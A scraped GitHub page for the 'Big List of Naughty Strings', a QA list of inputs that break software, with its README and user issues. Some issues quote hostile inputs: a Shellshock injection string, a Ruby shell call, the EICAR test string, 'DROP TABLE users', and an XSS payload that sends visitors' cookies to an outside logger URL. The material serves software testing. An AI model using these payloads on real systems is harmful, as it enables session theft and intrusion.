minimaxir / big-list-of-naughty-strings Goto Github PK

The Big List of Naughty Strings is a list of strings which have a high probability of causing issues when used as user-input data.

License: MIT License

Python 49.97% Shell 7.49% Go 38.09% Makefile 4.45%

big-list-of-naughty-strings's Introduction

Big List of Naughty Strings

The Big List of Naughty Strings is an evolving list of strings which have a high probability of causing issues when used as user-input data. This is intended for use in helping both automated and manual QA testing; useful for whenever your QA engineer walks into a bar.

Why Test Naughty Strings?

Even multi-billion dollar companies with huge amounts of automated testing can't find every bad input. For example, look at what happens when you try to Tweet a zero-width space (U+200B) on Twitter:

Although this is not a malicious error, and typical users aren't Tweeting weird unicode, an "internal server error" for unexpected input is never a positive experience for the user, and may in fact be a symptom of deeper string-validation issues. The Big List of Naughty Strings is intended to help reveal such issues.

Usage

blns.txt consists of newline-delimited strings and comments which are preceded with #. The comments divide the strings into sections for easy manual reading and copy/pasting into input forms. For those who want to access the strings programmatically, a blns.json file is provided containing an array with all the comments stripped out (the scripts folder contains a Python script used to generate the blns.json).

Contributions

Feel free to send a pull request to add more strings, or additional sections. However, please do not send pull requests with very-long strings (255+ characters), as that makes the list much more difficult to view.

Likewise, please do not send pull requests which compromise manual usability of the file. This includes the EICAR test string, which can cause the file to be flagged by antivirus scanners, and files which alter the encoding of blns.txt. Also, do not send a null character (U+0000) string, as it changes the file format on GitHub to binary and renders it unreadable in pull requests. Finally, when adding or removing a string please update all files when you perform a pull request.

Disclaimer

The Big List of Naughty Strings is intended to be used for software you own and manage. Some of the Naughty Strings can indicate security vulnerabilities, and as a result using such strings with third-party software may be a crime. The maintainer is not responsible for any negative actions that result from the use of the list.

Additionally, the Big List of Naughty Strings is not a fully-comprehensive substitute for formal security/penetration testing for your service.

Library / Packages

Various implementations of the Big List of Naughty Strings have made it to various package managers. Those are maintained by outside parties, but can be found here:

Library	Link
Node	https://www.npmjs.com/package/blns
Node	https://www.npmjs.com/package/big-list-of-naughty-strings
.NET	https://github.com/SimonCropp/NaughtyStrings
PHP	https://github.com/mattsparks/blns-php
C++	https://github.com/eliabieri/blnscpp

Please open a PR to list others.

Maintainer/Creator

Max Woolf (@minimaxir)

Social Media Discussions

June 10, 2015 [Hacker News]: Show HN: Big List of Naughty Strings for testing user-input data
August 17, 2015 [Reddit]: Big list of naughty strings.
February 9, 2016 [Reddit]: Big List of Naughty Strings
January 15, 2017 [Hacker News]: Naughty Strings: A list of strings likely to cause issues as user-input data
January 16, 2017 [Reddit]: Naughty Strings: A list of strings likely to cause issues as user-input data
November 16, 2018 [Hacker News]: Big List of Naughty Strings
November 16, 2018 [Reddit]: Naughty Strings - A list of strings which have a high probability of causing issues when used as user-input data

License

MIT

big-list-of-naughty-strings's People

Stargazers

Watchers

Forkers

ejcx i-manolov martindale kdeloach x5a basicsbeauty kylemanna alric jimrandomh abotsis sohonetlabs bparafina justizin solidstate-tech dot-sean damimj macneib tudorconstantin ctborg jgrossophoff step1profit exfalso agtlucas gohar94 wompy mwmalinowski tjordan73 jwilkins ericpaulbishop dreed1 arthurvondyck babo kod3r malcolmgreaves mahiki effectiveprogramming-forks knkoji piratedave segmond stevenvandervalk milstein bradparks afthill seem-sky operator-dd3 libin jbkahn alxndr 238ra mrafayaleem gyoza michiel jozsefs rickardnorlander lamby sunbox katjaasmus priyank1508 pranathib nurgl10 abenga apfeiffer1 kindlyops prince-mishra pepijnolivier paultyng sfaragenis danggrianto j2ali romil96 fourmojo sgtatham samgiampa juliustm trashsydowdev codefi ddworken prodigeni dipsec rschoultz hasantayyar samurai-sam jaeh seanmjobrien allengaller aleksandriakhnev rmkane amooij kronion kaulkie bbelyeu qqtinypon dmitrym0 kokomo snstrbl tarodenberg martinsv mmallad grimskin emrickgarrett

big-list-of-naughty-strings's Issues

Question: How to protect yourself properly?

Now that we have a list of potential naughty strings, what do you do with it to protect yourself properly? What's the best way to use this list to protect your backend where user input is required?

I'll be using this list in a nodejs based app with a mongo db, is it "enough" to test if the user input .contains() a line from the list? What would be a better way to protect yourself, rather than just looping over the list and checking for something that's equal (or at least contains in the user input)?

AngularJS curly brackets

Hello.

I assume double curly brackets used in AngularJS for data binding are worth adding to that list. If not escaped properly string like {{ blablabla }} may crash AngularJS app.

More on AngularJS syntax: https://docs.angularjs.org/guide/introduction

Implement multi-language string-sanitization framework utilizing JSON file?

I am suggesting the creation of a library (JavaScript, Python, Java, C/C++, etc.) for sanitizing strings using the JSON file blns.json.

Separate potentially dangerous strings to a separate file

Reading the discussion about removing "DROP" statement from BLNS, I thought that is my be a good idea to separate potentially dangerous strings (as DROP statement, XML fork bomb, etc.) to a separate file different than blns.txt to make sure that testing will be done with no potential data-loss.

This change will be particularly useful for testing in a production environment (I'm sure that some of the users using BLNS test directly in a production environment).

Comma as numeric decimal point denotion

Many languages use the comma , to denote decimals, and the period . to denote thousands separation. https://en.wikipedia.org/wiki/Decimal_mark
Is it worth, in the numeric section, having a variety of these:

whilst perhaps not naughty strings, a coder that is used to comma-denoted-decimal may be caught out.

single blank

... single blank or trailing/leading blanks are missing, especilly " ". Also "%" and "_" (SQL escapes)

Some un-code representation

I like this project, and am likely to pull it's strings into a java project I'm working on, however that means extracting and making compatible with Java. It'd be nice to have a file that's parseable by other languages.

shell shock string

Maybe add the shell shock bash code injection string:

() { :;}; echo vulnerable

There might be a lot of more such strings for many different languages/environments.

Typo in the date of social media discussions

I was working on my report Information Dynamics on the GitHub Network, using this repository as a (sample) popular GitHub repository, and found that the date of its first Hacker News submission is wrong. It should be Aug. 10, 2015.

Ruby Strings: System Should Be system (Lowercase "S")

big-list-of-naughty-strings/blns.txt

Line 572 in 8a11558

System("ls -al /")

http://ruby-doc.org/core-2.4.0/Kernel.html#method-i-system

Smart quotes in HTML

A Not-So-Hypothetical situation:

Your customer walks into a bar.
Your customer orders up some XML. Yum!
The customer isn't satisfied, so they edit the XML by hand. In Microsoft Word.
Suddenly, your customer's XML is filled with smart quotes.

What's a poor parser to do?

<foo val=“bar” />

I'm not sure how much of a problem that this actually is, so feel free to close this if it's a little too far-fetched.

It's one of those things that's technically-not-exactly-wrong, but also almost-definitely-not-right.

Date/Time/DateTime strings

There should be a section that contains Date, Time, and DateTime strings. Just as numbers can be encoded in various ways, so can these.

Is there a tutorial on how to alter blns.txt and then generate the other files? If so, I should be able to file a pull request for them. But just off the top of my head, and keeping it to English (the Scunthorpe Problem section and the comments don't contain other languages), I can think of several additions, some valid and some not:

January 23, 2016
23 JAN 2016
23 JAN 16
23-JAN-2016
23 January 2016
...
Jan. 23, 2016

00:00:00
00:00:00 AM
12:00:00 AM
12:00:00 PM
23:59:59.997
12:00:00
18:48:42
...
7:48 pm

January 23, 2016 12:00 am
23/1/16 14:54
...
20160123T000000

And for things that shouldn't be accepted

February 29, 2017
26:84:94
14:00 pm

The possibilities are endless, but aren't they always? Between the US order of M/D/Y and the European order of D/M/Y, 24 hour time, standardized timestamps, indicating UTC with a Z, would this be a valuable addition to the list?

Package.json

Add package.json so that repository can be added as dependency

Section for Date/Time values

Would a section for Date/Time values be a productive idea? To my knowledge, systems don't parse raw DateTime strings unless you explicitly say if it's a DateTime parser, and DateTime parsers don't take in raw DateTime strings, opting instead to use some sort of Date/Time selector widget on the client and doing the calculation on server.

Provide a list of suggested tests to perform

Even having been keeping an eye on this repo, I was surprised at how much I didn't know to test for when a recent post in /r/rust/ linked back to Eevee's "Dark corners of Unicode".

Currently, I think the BLNS suffers from a situation similar to "100% branch coverage gives a false sense of security" because it shares the same "If you're not asserting the right things..." problem.

Here are the things from that blog post (beyond the famous "Turkish I" problem) which I think should be covered in a supplementary "how to use the BLNS" document:

Test anything which involves sorting, case conversion, case-insensitive matching, date-handling, or working with decimals under the Turkish locale (It's not just the case-correpondence and sorting rules which differ)
Test your equality-testing and upper/lower-case conversion code against things like ß vs ss, ae vs æ, ... vs …, and the NFC (normal form composed) vs. NFD (normal form decomposed) forms of characters like é which have both a combining-character representation and a precomposed representation for round-trip compatibility with legacy systems.
Test your normalization code against Japanese text, where stripping diacritics can result in significant changes in pronunciation and meaning. (On the order of confusing unvoiced and voiced versions of the same consonant, like "kook" (strange/eccentric/crazy person) and "gook" (a racial slur)).
Test that your code which slices or normalizes strings doesn't split apart flag emoji. (The underlying regional indicator symbol pairs are not declared as combining characters)
Test that your code doesn't break up emoji defined using U+200D ZERO WIDTH JOINER.
If you're not simply relying on a browser for text rendering, make sure that both normal forms of Hangul (the primary Korean writing system) render equivalently and properly.
If you're rendering your own character-cell graphics, make sure double-width characters added in newer versions of the Unicode spec, like 🎁 don't overdraw the character which follows them, get cut off, or throw off the column alignment.
Make sure your system displays characters from recent Unicode specs, given a suitable font. (WeeChat silently ignores emoji because it relies on a "how wide is this character" function which reports 0 for stuff that's too new for the bundled copy of the Unicode database)
Audit whether there's anywhere accepting the Ogham space character would be a "wetware exploit" (something where it's valid... but not what the human expects). For example, this this Javascript produces 42 as its output: alert(2+ 40);
Audit whether you're handling U+2800 BRAILLE PATTERN BLANK (looks like a space in most fonts, but isn't) appropriately.
Make sure everything in your stack handles emoji outside the Basic Multilingual Plane properly. (eg. MySQL's utf8 encoding is limited to three bytes per character, which doesn't cover all of the supplementary character planes, so you have to ALTER TABLE it to utf8mb4)
Make sure your system doesn't assume Apple's specific emoji font. They're unicode characters like anything else.
The unicode directionality characters in the BLNS are for testing to make sure your website is wrapping each piece of user-provided text in <bdi></bdi> (bidirectional isolation) elements so it can't alter the directionality of the rest of the content.

EDIT: (In hindsight, that list would be much more clear if I formatted it as a table with each row representing a type of input to test (eg. doesn't break up emoji defined using U+200D ZERO WIDTH JOINER) and each column representing where in your program would be potentially vulnerable (eg. string slicing/replacement/etc.).

'walks into a bar' link broken

The link provided in the README is broken; it seems that the destination site has removed all traces of '.aspx', and is blaming others for having outdated links. :(

Escape Character '\', or '\\' for certain uses.

For the 'Reserved Strings' category, can be used in string interpretation to wreak havoc, such as invalid escape character usage. Overall dangerous.

ZWJ Sequence

I think it may be useful to include a recommended ZWJ sequence, especially one of the longer ones. For example, 👩‍👩‍👧‍👦 is ideally displayed as one 'family' character, but is actually 7 Unicode characters, and may fallback to display 4 characters for applications that don't directly support it. Inspired by: https://stackoverflow.com/questions/43618487/why-is-treated-so-strangely-in-swift-strings

The string that crashed OS X

You have the string that crashed iOS, but not the string that crashed OS X, File:///. See http://thenextweb.com/shareables/2013/02/02/typing-these-eight-characters-will-crash-almost-any-application-on-your-mac/

Regular Expression Injection

didn't notice these, but it happens when you do things like use regular expressions for search.

`<plaintext>`

<plaintext> tag is really naughty, as it is imposible to close it in any way using just HTML. Example at codepen.

Actually, in most cases even just <plaintext string in HTML context would be enough to break stuff.

Python escape sequences

Sometimes you find python escape characters are accepted (and decoded) where they shouldn't be. E.g. something that only accepts alphanumerics goes on to accept
\60
because unescaped it turns into the character '0' but after validation is passed it gets stored as "\60", thus coming back to bite you when it's read back and not unescaped.

suggest more variants of Inf/NaN

I suggest adding the following:

Whether "Infinity" is the stringification, and whether Infinity is the the numification,

depends on the C library.

INF

Win32 (Visual C, really) variants of the infinity and nan

(see http://blogs.msdn.com/b/oldnewthing/archive/2013/02/21/10395734.aspx)

Yes, the # really is part of the stringification.

The 1#IND is a type of quiet nan.

1#INF
-1#IND
1#QNAN
1#SNAN
1#IND

Opening console handles on Windows

Passing the values CONIN$ and CONOUT$ to fopen etc. on Windows return handles to stdin and stdout respectively. Probably rarely tested against to prevent unwanted access. See:

https://msdn.microsoft.com/en-us/library/windows/desktop/ms682075%28v=vs.85%29.aspx

How to use this list in Selenium

Please provide a basic usage guide on how to feed this list to Selenium and verify the results. Thank you.

New found string that will crash currently released versions of Chrome Browser

The following string without the space has been found to crash currently released Chrome Browsers
http: //a/%%30%30

EICAR test file

https://en.wikipedia.org/wiki/EICAR_test_file

standard string that is interpreted as virus by anti-virus software:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Normal arabic strings should be removed from the naughty list

The below 2 strings should be removed from the list, it is normal Arabic strings that used frequently. There is no risk with them:

"﷽",
"ﷺ",

You can check below the Arabic Unicode scripts:
https://en.wikipedia.org/wiki/Arabic_script_in_Unicode

JSON cannot represent some naughty strings

One of my favourite naughty strings is invalid utf-8 - for example, a bare \xff.
It's quite common to get 500s,etc on these as no-one ever bothers to check for unicode decoding errors.
However, because JSON requires all strings to be valid utf-8, this example is only able to be included in the txt file.

Would this be something worth including and adding a special case in the script to omit from the json?
Or is it too naughty for blns?

EDIT: This HN comment (https://news.ycombinator.com/item?id=10035738) suggested having the JSON file be of b64 encoded strings. This is a good suggestion, and allows arbitrary naughty bytes to be used, at the cost of readability.

where to put multiline strings?

this attack on webct has two different forms, one of them is a multiline string:

<div id="mycode" style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="// balupton's javascript session stealer automatic hack
	var iframe = document.createElement('iframe');
	iframe.style.border = 'none';
	iframe.style.height = '1px';
	iframe.style.width = '1px';
	var url =
		'http'+'://www.balupton.com/sandbox/logger.php'
		+'?variable=document.cookie'
		+'&value='+escape(document.cookie)
		+'&url='+escape(document.location)
		+'&pass_code=secret_key'
		;
	iframe.src = url;
	document.body.appendChild(iframe);">Thank you</div>

With the newline break of the javascript word being part of it. Here is the simplified version:

<div style="BACKGROUND: url('java
script:alert(123)')">Thank you</div>

However it seems blns.txt won't support it.

Created a NodeJS Module for naughty string checking

Really liked this project, I created an NodeJS module for checking naughty strings 😄
You can see the module here: https://gautamkrishnar.github.io/naughtychecker.js

Any suggestions?

PS: You can close this issue. I created it just to inform you...

Mine

Everything

Newlines characters in base64

All base64 strings¹ end with a newline character, eg.:

>>> base64.b64decode("dW5kZWZpbmVkCg==")
b'undefined\n'
>>> base64.b64decode("dW5kZWYK")
b'undef\n'
>>> base64.b64decode("Q09NMQo=")
b'COM1\n'

Is this on purpose? That newline character seems pretty useless.
If not, that line should probably read echo -n.

1: all but the empty string itself, which makes it even more annoying because it makes two cases to handle.

Japanese kana are 3 bytes, kanji are at least 3 bytes.

The .txt file comments say they are 2 byte characters. Quick checking with C's strlen would also implicate Korean hangul are 3 bytes as well.

Two-Byte Characters

Strings which contain two-byte characters: can cause rendering issues or character-length issues

田中さんにあげて下さい
...

new string: ssh escape sequence

The sequence \n~. will cause default-configured ssh sessions to terminate when passed as input.
I realise it's horrifying but I have in fact seen this crop up in the wild where user data was transferred between machines via tar c ... | ssh other tar x (for anyone who finds this from google, the correct fix (besides "don't do that") is ssh -e none)

blns.txt in Pull Requests unexpectedly being changed to binary format w/ no diff

I have no idea why this keeps happening.

I can't auto accept any files that show this because it might corrupt readability on the web. I can try to merge the PRs; worst case, I'll add the strings manually to my own copy and close the PRs.

node module

I just made a connivence module and would like to add you as a maintainer on npm, if you could provide your npm ID that would be useful.

to aad:

found on twitter [ https://twitter.com/irongeek_adc ]: Nͣͥͬͩͣ̂̂̂̂̂̂̂̂̂̂̂̂̂̂

Date/Time Strings

Making note to add date/time strings which can trick up naive date/time parsers:

non-US date/time formats (e.g. 2017.01.16)
Illegal dates/times (e.g. 2017-01-32 26:00)
Leap Day on non-leap year (e.g. 2017-02-29)
Timezones/illegal timezones

Reference: Wikipedia, xkcd

add constructor and proto

Since javascript becomes so popular it's not uncommon for developers to use plain object initializers in the language (i.e. var hash = {}).

Asking objects whether key is in the hash is often done via

var hash = {}
function contains(key) {
  return key in hash
}

Which gives false-positives for words constructor and __proto__. This is a source of bugs that are hard to find. But maybe by adding these two words to your list, more people will test their code against this bug :).

Replace "DROP TABLE users" with something more sane

"DROP TABLE users" should be replaced to avoid potential data loss.

Urgent, need bugfix for human injection.

If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.

World view changed. How can I contact outside world? How do I wake up from coma?

Not actually NPM module

@minimaxir I saw that there is a package.json, but there isn't actually a NPM package attached to it. Would you mind publishing it to NPM?

Remove trailing spaces from blns.json

I'd like to test that a round-trip for my JSON library does not produce any deviation. I have a pretty printer where I can adjust the indention. The problem I have comparing the result of the round-trip with the original blns.json is the trailing spaces at the end of (almost) each line. I don't think they serve any purpose and it would make it easier for me and hopefully others as well if they could be removed.

UTF-8 byte ordermarker mid file

I apologize if it this doesn't count but one of my favorite/least favorite bugs is having random utf-8 byte order marker(BOM) mid file. This is often caused by naively concatenating files together.

Easter egg?

While looking at the .txt file I found this one:

Human injection

Strings which may cause human to reinterpret worldview

If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.

Although I found it humourous I don't think it's testing any actual bug, maybe you should consider to remove it. Or maybe just leave it as an easter egg, I just wanted to point it to you.

Billion laughs xml "bomb"

Example here: https://en.wikipedia.org/wiki/Billion_laughs

Go package

Is the owner open to adding a .go file to make this repo importable as a Golang package? I can do a PR if so.

Strings out of scope

#Looks like we're getting an ever growing list of strings which are carefully crafted injections.
I believe this is entirely outside of the scope of this project.

Lines 195 to 434, for example, are complex strings which are designed to work in specific scenarios and would be used for fuzzing inputs. We should leave those kinds of strings to https://github.com/fuzzdb-project/fuzzdb and keep doing what the purpose of this project was to begin with.

If we were to merge everything from fuzzdb into the blns, it would become a mass of crap.
Yet, we appear to be maintaining (most of which between lines 195 to 434) various fuzzing strings; an incomplete collection of such.

Let me know what you all think about this proposition.

Integrate fuzzdb

https://code.google.com/p/fuzzdb/

I'm not sure if it makes sense to effectively fork the project though.